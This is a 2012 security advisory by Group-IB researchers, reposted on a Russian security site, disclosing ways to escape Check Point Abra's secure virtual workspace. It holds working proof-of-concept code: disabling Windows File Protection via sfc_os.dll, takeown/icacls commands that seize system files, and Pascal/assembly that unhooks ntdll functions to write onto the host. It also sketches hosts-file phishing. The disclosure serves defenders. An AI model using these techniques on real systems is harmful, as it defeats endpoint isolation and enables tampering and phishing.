Информационная безопасность
[RU] switch to English


Дополнительная информация

  Обход защиты в Checkpoint Arba

From:komarov_(at)_group-ib.ru <komarov_(at)_group-ib.ru>
Date:11 июля 2012 г.
Subject:Checkpoint Abra - Vulnerabilities

Check Point Abra Vulnerabilities

#############################################

Vendor: Check Point Software Technologies Ltd
Product web page: http://rus.checkpoint.com/products/abra/index.html; http://www.checkpoint.com/products/go/
Platforms: Windows XP, Vista, 7 (32 bit)
Authors: Belov V., Komarov A. (Group-IB)

#############################################

Summary: Check Point Abra allows you to create a secure virtual workspace on any PC, this solution may significantly affect the way of organizing the work of mobile employees. With Abra solutions you can easily turn any PC into a fully secure workplace, so you no longer need to carry bulky laptops or heavy folders. Convenient USB-drive form factor body allows you to quickly create a virtual workplace, while the virtualization technology and built-in encryption ensures the mobile data safety. Abra provides users with protection when working in offline mode by an encrypted USB-drive, and online - through VPN client software.

Description: Imperfect control modules and data monitoring application allows you to run any file, bypassing the current policy around virtualization, and read\write data from an isolated Abra session directly into the PC operating system, conduct phishing attacks, etc.

#############################################################################

Run third-party software in a secure session:

Control rules used applications are in the file
X:\PWC\data\sandbox-persistence.ref (и X:\PWC\data\ swspogo.xml, F:\PWC\data\ ISWPolicy.xml, X:\PWC\data\ ics_policy.xml). Any application not from the white list will not be able to perform when working in a secure session.

As part of the session is allowed to run the pre-installed software: Internet Explorer, Notepad, Calculator, Office, Remote Desktop Connection (+ Portable Apps) to use system utilities, and host machines that are clearly indicated in the configuration file F:\PWC\data\sandbox-persistence.ref.

Example:

<Execute OriginalName="calc.exe" PathName="\calc.exe" AppName="Microsoft Calculator" UIDescription="Microsoft Calculator" id="134"/>
Application Control session examines the application run only on paths, file names, as well as record VersionInfo in the file.

This implies you can import an arbitrary application and run it to bypass the control policy of applications. This is implemented by changing the file name and the field in the resource OriginalFilename VERSIONINFO on any of the white list. Moreover, the user may replace any executable file (eg archiver WinRar) to the host OS without any imports into the secure session and the file will automatically be filled in a secure session (run by the correspondences of extensions, or from the "start" menu).

It is also possible to substitute the system default software from the session "Start" menu (Internet Explorer, Notepad, Calculator, File Protection is off to the host OS, you need administrator rights). The substitution of system files can be implemented after disabling File Protection Windows File Protection with a call to the fifth ordinal of exported file system sfc_os.dll functions (windows xp), sample code:

 hInst := LoadLibrary('sfc_os.dll');
 proc := GetProcAddress(hInst, ordinal 5);
 filename := 'c:\windows\system32\calc.exe';
 asm
   push -1
   push filename
   push 0
   call proc
 end

Either by modifying the rights to the file (Vista and above):
takeown /f <имя_файла>
icacls <имя_файла> /grant %username%:F
icacls <имя_файла> /grant *S-1-1-0:(F)

It is also well executed Bat-files downloaded from the host computer’s folder called "Downloaded from PC", or any other.

The structure of the boot process and secure session:

During the secure session creates a separate process group. Executable files and libraries are the product of two assemblies 32 and 64-bit. But despite this, the 64-bit systems still run a few 32-bit modules in the X folder: \ Go \ PWC \ WoW64.

The second copy process launches the ISWMGR.exe Explorer explorer.exe processes, which is the parent of all, offered in a secure session of external tools and imported programs.

When starting the imported files in a secure session they run a separate application-boot X: \ PWC \ WOW64 \ ISWLDR.dat. He, in turn, loads the library ISWUL.dll, causing the function to set InitHook interceptions. Installed hooks calling functions for working with files, the registry, the clipboard, cryptography, etc:

HANDLE (__stdcall *__cdecl GetAddrOf_SetClipboardData())(UINT, HANDLE)
{
 HANDLE (__stdcall *result)(UINT, HANDLE); // [email protected]

 result = SetClipboardData;
 addr_SetClipboardData = SetClipboardData;
 return result;
}

int __cdecl hooks_Clipboard()
{
 int v0; // [email protected]
 int v1; // [email protected]
 int v2; // [email protected]
 int v3; // [email protected]
 int result; // [email protected]

 v0 = splice_func(addr_SetClipboardData, callback_SetClipboardData);
 if ( v0 )
   addr_SetClipboardData = v0;
 v1 = splice_func(addr_GetClipboardData, callback_GetClipboardData);
 if ( v1 )
   addr_GetClipboardData = v1;
 v2 = splice_func(addr_OpenClipboard, callback_OpenClipboard);
 if ( v2 )
   addr_OpenClipboard = v2;
 v3 = splice_func(addr_EmptyClipboard, callback_EmptyClipboard);
 if ( v3 )
   addr_EmptyClipboard = v3;
 result = splice_func(addr_CloseClipboard, callback_CloseClipboard);
 if ( result )
   addr_CloseClipboard = result;
 return result;
}

It is possible to bypass interceptor functions by their release (recovery of the original code functions as it was before the modification) - direct reading from a file system folder (for the use of technology before the reading system files must be copied to a temporary folder and install a structured exception handler), such as ntdll.dll, read the first 10-15 bytes of the function from the file and overwrite the buffer was read the prologue of the corresponding function in the memory (which is the function of the jump-hook, for example ZwLoadDriver).

Technique, for example, can allow making changes to files \ Registry of the secure session directly to the host system.

procedure resolve_APIs_from_dll_images(mapped_dll_base: pointer; dllname: string);
var
var_4, var_8, var_10, var_20, var_24, var_2C, var_28, var_3C, var_1C, dllbase, Src, old: DWORD;
begin
asm
 pushad
  mov     eax, [mapped_dll_base]
  mov     ecx, [eax+3Ch]
  mov     edx, [mapped_dll_base]
  lea     eax, [edx+ecx+18h]
  mov     [var_10], eax
  mov     ecx, [var_10]
  mov     edx, [mapped_dll_base]
  add     edx, [ecx+60h]
  mov     [var_4], edx
  mov     eax, [var_4]
  mov     ecx, [mapped_dll_base]
  add     ecx, [eax+1Ch]
  mov     [var_8], ecx
  mov     ecx, [var_4]
  mov     edx, [mapped_dll_base]
  add     edx, [ecx+20h]
  mov     [var_20], edx
  mov     eax, [var_4]
  mov     ecx, [mapped_dll_base]
  add     ecx, [eax+24h]
  mov     [var_2C], ec
  push    dllname
  call    LoadLibrary
  mov     [var_28], eax
  cmp     [var_28], 0
  jne     @loc_41D111
  jmp     @ending
@loc_41D111:
  mov     [var_24], 0
  jmp     @loc_41D135
@loc_41D11A:
  mov     eax, [var_24]
  add     eax, 1
  mov     [var_24], eax
  mov     ecx, [var_20]
  add     ecx, 4
  mov     [var_20], ecx
  mov     edx, [var_2C]
  add     edx, 2
  mov     [var_2C], edx
@loc_41D135:
  mov     eax, [var_4]
  mov     ecx, [var_24]
  cmp     ecx, [eax+18h]
  jnb     @ending
  mov     ecx, [var_24]
  mov     edx, [var_20]
  mov     eax, [mapped_dll_base]
  add     eax, [edx]
  mov     ecx, [var_24]
  mov     edx, [var_8]
  mov     eax, [var_28]
  add     eax, [edx+ecx*4]
  mov     [var_3C], eax
  mov     ecx, [var_24]
  mov     edx, [var_8]
  mov     eax, [mapped_dll_base]
  add     eax, [edx+ecx*4]
  mov     [Src], eax
  push    0Ah
  mov     ecx, [Src]
  push    ecx
  lea     edx, [Dst]
  push    edx
  call    memcpy
  add     esp, 0Ch
  lea     eax, [old]
  push    eax
  push    PAGE_EXECUTE_READWRITE
  push    0Ah
  mov     eax, [var_3C]
  push    eax
  call    VirtualProtect
  push    0Ah
  lea     ecx, [Dst]
  push    ecx
  mov     eax, [var_3C]
  push    eax
  call    memcpy
  add     esp, 0Ch
  jmp     @loc_41D11A
@ending:
 popad
end;
end;

function UnHook(dllname: string): boolean;
var
MapOffset: pointer;
dll, filename: string;
MapHandle, FileHandle: THandle;
Begin
dll := SystemDir + '\' + dllname;
filename := GetSpecialPath(CSIDL_APPDATA) + '\' + dllname;
result := CopyFile(PChar(dll), PChar(filename), false);
if result then
begin
FileHandle := CreateFile(pChar(filename), GENERIC_READ, FILE_SHARE_READ, nil, OPEN_EXISTING, 0, 0);
If FileHandle <> INVALID_HANDLE_VALUE then
 Try
  MapHandle := CreateFileMapping(FileHandle, nil, $1000002, 0, 0, nil);
  If MapHandle <> 0 then
   Try
    MapOffset := MapViewOfFile(MapHandle, FILE_MAP_READ, 0, 0, 0);
    If MapOffset <> nil then
     Try
       resolve_APIs_from_dll_images(MapOffset, dllname);
     Finally
      UnmapViewOfFile(MapOffset);
     End;
   Finally
    CloseHandle(MapHandle);
   End;
  Finally
   CloseHandle(FileHandle);
  End;
DeleteFile(filename);
end;
End;

procedure Write2File(filename, s: string);
var
f: textfile;
begin
 assignfile(f, filename);
 rewrite(f);
 writeln(f, s);
 closefile(f);
end;

begin
UnHook('ntdll.dll');
..
Write2File('c:\users\Administrator\Desktop\POC.txt', 'Now we writing to host OS');
end;

############################################

Possible implementation of a phishing attack by modifying the file etc \ hosts host system, all changes in it are also automatically applied for the secure session.

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород